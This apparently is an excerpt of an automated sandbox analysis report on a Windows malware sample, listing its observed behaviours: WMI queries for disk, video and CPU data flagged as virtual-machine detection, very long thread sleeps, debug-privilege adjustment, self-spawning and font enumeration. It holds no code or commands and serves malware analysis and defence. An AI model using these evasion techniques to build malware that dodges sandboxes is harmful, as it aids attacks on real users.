Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: chTJmCR9bS.exe PID: 7384, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\chTJmCR9bS.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\chTJmCR9bS.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Memory allocated: 1640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Memory allocated: 3300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Memory allocated: 3180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Memory allocated: 9640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Memory allocated: A640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Memory allocated: A850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Memory allocated: B850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Memory allocated: 1760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Memory allocated: 3420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Memory allocated: 3220000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Window / User API: threadDelayed 2158			Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Window / User API: threadDelayed 5442			Jump to behavior

Source: C:\Users\user\Desktop\chTJmCR9bS.exe TID: 7404	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe TID: 7792	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe TID: 7716	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe TID: 7632	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\chTJmCR9bS.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: chTJmCR9bS.exe, 00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000000.00000002.1828781159.0000000009490000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: schnvhgFsC
Source: chTJmCR9bS.exe, 00000002.00000002.1927999993.00000000015B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\chTJmCR9bS.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\chTJmCR9bS.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\chTJmCR9bS.exe

Process created: C:\Users\user\Desktop\chTJmCR9bS.exe "C:\Users\user\Desktop\chTJmCR9bS.exe"

Jump to behavior

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Users\user\Desktop\chTJmCR9bS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
